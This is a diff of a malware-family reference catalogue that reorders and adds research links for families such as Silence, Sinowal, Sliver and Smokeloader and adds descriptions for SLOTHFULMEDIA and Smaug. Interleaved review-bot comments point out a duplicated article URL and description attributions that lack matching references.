"https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf", "https://www.group-ib.com/resources/threat-research/silence.html", + "https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html", + "https://securityintelligence.com/posts/x-force-prevents-zero-day-from-going-anywhere", + "https://securelist.com/the-silence/83009/", + "https://www.huntress.com/blog/investigating-intrusions-from-intriguing-exploits", + "https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/", + "https://github.com/Tera0017/TAFOF-Unpacker", + "http://www.intezer.com/silenceofthemoles/", + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", + "https://malware.love/malware_analysis/reverse_engineering/2023/02/12/analyzing-truebot-packer.html", + "https://norfolkinfosec.com/how-the-silence-downloader-has-evolved-over-time/", + "https://malware.love/malware_analysis/reverse_engineering/2023/02/18/analyzing-truebot-static-unpacking.html", "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", - "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/" + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf" ], "synonyms": [ "TrueBot" 
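Review bot: The added `"https://outpost24.com/blog/using-qiling-framework-to-unpack-ta505-packed-samples/"` and the re-added `"https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/"` appear to be the same article reachable under two domains, so the Silence/TrueBot entry now carries it twice. If the upstream source lists both, keeping one canonical URL and recording the other as an alias would reduce noise; a normalization step that compares URL paths before deduplicating `refs` would flag pairs like this automatically. The hunk starts on the previous physical line, with its `@@` header and first additions there.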
@@ -44084,8 +46144,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.silon", - "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm", - "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html" + "http://contagiodump.blogspot.com/2009/11/new-banking-trojan-w32silon-msjet51dll.html", + "http://www.internetnews.com/security/article.php/3846186/TwoHeaded+Trojan+Targets+Online+Banks.htm" ], "synonyms": [], "type": [] @@ -44110,10 +46170,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.simda", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", + "https://www.youtube.com/watch?v=u2HEGDzd8KM", "https://blog.trendmicro.com/trendlabs-security-intelligence/simda-a-botnet-takedown/", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", - "https://www.youtube.com/watch?v=u2HEGDzd8KM", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://secrary.com/ReversingMalware/iBank/" ], "synonyms": [ 
@@ -44142,15 +46202,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sinowal", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2", "https://en.wikipedia.org/wiki/Torpig", - "https://www.recordedfuture.com/turla-apt-infrastructure/", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.welivesecurity.com/2013/03/13/how-theola-malware-uses-a-chrome-plugin-for-banking-fraud/", "https://www.virusbulletin.com/virusbulletin/2014/06/sinowal-banking-trojan", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", - "https://www.symantec.com/security_response/writeup.jsp?docid=2008-010718-3448-99&tabid=2" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://www.recordedfuture.com/turla-apt-infrastructure/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/" ], "synonyms": [ "Anserin", 
@@ -44169,8 +46229,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://medium.com/@Sebdraven/gobelin-panda-against-the-bears-1f462d00e3a4", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/cve-2017-8750-rtf-and-the-sisfader-rat/" ], "synonyms": [], @@ -44184,9 +46244,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skimer", - "http://atm.cybercrime-tracker.net/index.php", + "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", - "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html" + "http://atm.cybercrime-tracker.net/index.php" ], "synonyms": [], "type": [] 
@@ -44226,15 +46286,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.skipper", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", - "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/", "https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf", - "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf", - "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/" + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", + "https://blog.telsy.com/following-the-turlas-skipper-over-the-ocean-of-cyber-operations/", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender-Whitepaper-PAC-A4-en_EN1.pdf" ], "synonyms": [ "Kotel" 
@@ -44301,10 +46361,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slingshot", - "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", "https://securelist.com/apt-slingshot/84312/", - "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/", - "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf" + "https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/", + "https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf", + "https://www.cyberscoop.com/kaspersky-slingshot-isis-operation-socom-five-eyes/" ], "synonyms": [], "type": [] 
@@ -44317,19 +46377,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sliver", - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks", - "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - "https://asec.ahnlab.com/en/47088/", - "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf", - "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/", - "https://github.com/BishopFox/sliver", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf", "https://www.telsy.com/download/5900/?uid=b797afdcfb", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks", + "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", + "https://www.immersivelabs.com/blog/detecting-and-decrypting-sliver-c2-a-threat-hunters-guide/", + "https://www.ncsc.gov.uk/files/Advisory%20Further%20TTPs%20associated%20with%20SVR%20cyber%20actors.pdf", + "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/", + "https://github.com/BishopFox/sliver", "https://github.com/chronicle/GCTI", + "https://asec.ahnlab.com/en/47088/", + "https://embee-research.ghost.io/shodan-censys-queries/", "https://team-cymru.com/blog/2022/04/29/sliver-case-study-assessing-common-offensive-security-tools/", + "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike", "https://www.team-cymru.com/post/sliver-case-study-assessing-common-offensive-security-tools", - 
"https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/" + "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx", + "https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/", + "https://asec.ahnlab.com/en/55652/", + "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf" ], "synonyms": [], "type": [] @@ -44351,12 +46416,12 @@ "value": "slnrat" }, { - "description": "", + "description": "According to MITRE, SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified \"sophisticated cyber actor\" since at least January 2017. It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia", - "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a", + "https://securelist.com/iamtheking-and-the-slothfulmedia-malware-family/99000/" ], "synonyms": [ "QueenOfClubs" 
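Review bot: The new SLOTHFULMEDIA description opens with `According to MITRE, ...` but the entry's `refs` array (Malpedia, CISA AR20-275A, Securelist) contains no MITRE ATT&CK link, so the source the text attributes itself to cannot be followed from the record. The Smaug hunk further down has the same mismatch: its description starts `According to PCrisk, ...` while its refs list Malpedia, PwC, Anomali and SentinelOne only. Either add the cited source URL to `refs` or drop the attribution phrase so each description stands on the sources the entry actually lists. The Sliver hunk that precedes this one on the same physical line starts on the previous line.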
@@ -44371,11 +46436,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.slub", - "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", - "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-kitsune.pdf", - "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html" + "https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html", + "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] @@ -44388,8 +46453,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac", - "https://www.secureworks.com/research/threat-profiles/bronze-express", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/Aug.10.The_Italian_Connection_An_analysis_of_exploit_supply_chains_and_digital_quartermasters/HTExploitTelemetry.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ "speccom" 
@@ -44417,18 +46482,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smanager", - "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", - "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/", "https://blog.vincss.net/2020/12/phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", - "https://blog.group-ib.com/task", - "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", - "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", "https://blog.vincss.net/2021/02/re020-elephantrat-kunming-version-our-latest-discovered-RAT-of-Panda.html", - "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", + "https://blog.vincss.net/2020/12/re018-2-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html?m=1", + "https://blog.vincss.net/2020/12/re018-1-analyzing-new-malware-of-china-panda-hacker-group-used-to-attack-supply-chain-against-vietnam-government-certification-authority.html", "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", - "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://0xthreatintel.medium.com/how-to-unpack-smanager-apt-tool-cb5909819214", - 
"https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf" + "https://blog.vincss.net/2020/12/re017-2-phan-tich-ky-thuat-dong-ma-doc-moi-co-nhieu-dau-hieu-lien-quan-toi-nhom-tin-tac-Panda.html", + "https://www.welivesecurity.com/2020/12/17/operation-signsight-supply-chain-attack-southeast-asia/", + "https://0xthreatintel.medium.com/reversing-apt-tool-smanager-unpacked-d413a04961c4", + "https://blog.group-ib.com/task" ], "synonyms": [ "PhantomNet" @@ -44452,13 +46517,13 @@ "value": "SmartEyes" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Smaug ransomware is available for download on the dark web: it is for sale as Ransomware as a Service (RaaS). Therefore, cyber criminals who purchase it can perform ransomware attacks without having to develop malware of this type. Smaug is designed to encrypt files, rename them and create a ransom message.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smaug", - "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.anomali.com/blog/anomali-threat-research-releases-first-public-analysis-of-smaug-ransomware-as-a-service", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html" + "https://labs.sentinelone.com/multi-platform-smaug-raas-aims-to-see-off-competitors/" ], "synonyms": [], "type": [] 
@@ -44471,9 +46536,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham", + "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html", "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise", - "https://www.mandiant.com/resources/burrowing-your-way-into-vpns", - "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html" + "https://www.mandiant.com/resources/burrowing-your-way-into-vpns" ], "synonyms": [], "type": [] 
@@ -44486,77 +46551,83 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader", - "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", - "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", - "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", - "https://x0r19x91.in/malware-analysis/smokeloader/", - "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", - "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", - "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html", - "https://hatching.io/blog/tt-2020-08-27/", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://youtu.be/QOypldw6hnY?t=3237", - "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://intel471.com/blog/privateloader-malware", - "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft", - "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", 
"https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md", - "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", - "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", - "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", - "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf", - "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", - "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html", - "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", - "https://www.silentpush.com/blog/privacy-tools-not-for-you", - "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html", - "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", "https://m.alvar.es/2019/10/dynamic-imports-and-working-around.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities", - "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html", - "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html", - "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer", - 
"http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", - "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view", - "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + "https://embee-research.ghost.io/smokeloader-analysis-with-procmon/", "https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe", - "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://danusminimus.github.io/Analyzing-Modern-Malware-Techniques-Part-4/", "https://suvaditya.one/malware-analysis/smokeloader/", - "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", - "https://asec.ahnlab.com/en/33600/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://eternal-todo.com/blog/smokeloader-analysis-yulia-photo", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet/", + "https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft", "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://asec.ahnlab.com/en/36634/", - "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", - "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/", - "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", - 
"https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", - "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", - "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd", - "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", "https://n1ght-w0lf.github.io/malware%20analysis/smokeloader/", - "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://research.checkpoint.com/2019-resurgence-of-smokeloader/", + "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd", + "https://malwareandstuff.com/examining-smokeloaders-anti-hooking-technique/", + "https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise", + "https://www.acronis.com/en-sg/cyber-protection-center/posts/8base-ransomware-stays-unseen-for-a-year/", + "http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html", "https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/", - "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf", + "https://www.cert.pl/en/news/single/dissecting-smoke-loader/", + "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-down-dofoil-with-windows-defender-atp/", + "https://youtu.be/QOypldw6hnY?t=3237", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://m.alvar.es/2020/06/unpacking-smokeloader-and.html", + "https://www.telekom.com/en/blog/group/article/a-new-way-to-encrypt-cc-server-urls-614886", + "https://hatching.io/blog/tt-2020-08-27/", + "https://m.alvar.es/2020/06/comparative-analysis-between-bindiff.html", + "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145", + 
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://blogs.blackberry.com/en/2022/07/smokeloader-malware-used-to-augment-amadey-infostealer", + "https://unit42.paloaltonetworks.com/analysis-of-smoke-loader-in-new-tsunami-campaign/", + "https://bartblaze.blogspot.com/2017/08/crystal-finance-millennium-used-to.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://github.com/vc0RExor/Quick-Analysis/blob/main/SmokeLoader/SmokeLoader.md", + "http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html", + "https://blog.badtrace.com/post/anti-hooking-checks-of-smokeloader-2018/", + "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html", + "https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities", + "https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html", + "https://asec.ahnlab.com/en/36634/", + "https://blog.malwarebytes.com/threat-analysis/2016/08/smoke-loader-downloader-with-a-smokescreen-still-alive/", + "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer", + "https://info.phishlabs.com/blog/smoke-loader-adds-additional-obfuscation-methods-to-mitigate-analysis", + "https://research.openanalysis.net/smoke/smokeloader/loader/config/yara/triage/2022/08/25/smokeloader.html", + "https://www.sentinelone.com/blog/going-deep-a-guide-to-reversing-smoke-loader-malware/", + "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/", + 
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://intel471.com/blog/privateloader-malware", + "https://www.silentpush.com/blog/privacy-tools-not-for-you", + "https://securitynews.sonicwall.com/xmlpost/html-application-hta-files-are-being-used-to-distribute-smoke-loader-malware/", + "https://drive.google.com/file/d/13BsHZn-KVLhwrtgS2yKJAM2_U_XZlwoD/view", + "https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US", + "https://blog.malwarebytes.com/cybercrime/2018/01/fake-spectre-and-meltdown-patch-pushes-smoke-loader/", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://asec.ahnlab.com/en/33600/", + "https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", + "https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/", + "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/", + "https://int0xcc.svbtle.com/a-taste-of-our-own-medicine-how-smokeloader-is-deceiving-dynamic-configuration-extraction-by-using-binary-code-as-bait", + "https://www.spamhaus.org/news/article/774/smoke-loader-improves-encryption-after-microsoft-spoils-its-campaign", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.101_ENG.pdf", + "https://x0r19x91.in/malware-analysis/smokeloader/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service", + 
"https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
 "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/",
- "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html"
+ "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/",
+ "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a",
+ "http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries"
 ],
 "synonyms": [
 "Dofoil",
@@ -44574,8 +46645,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru",
- "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators",
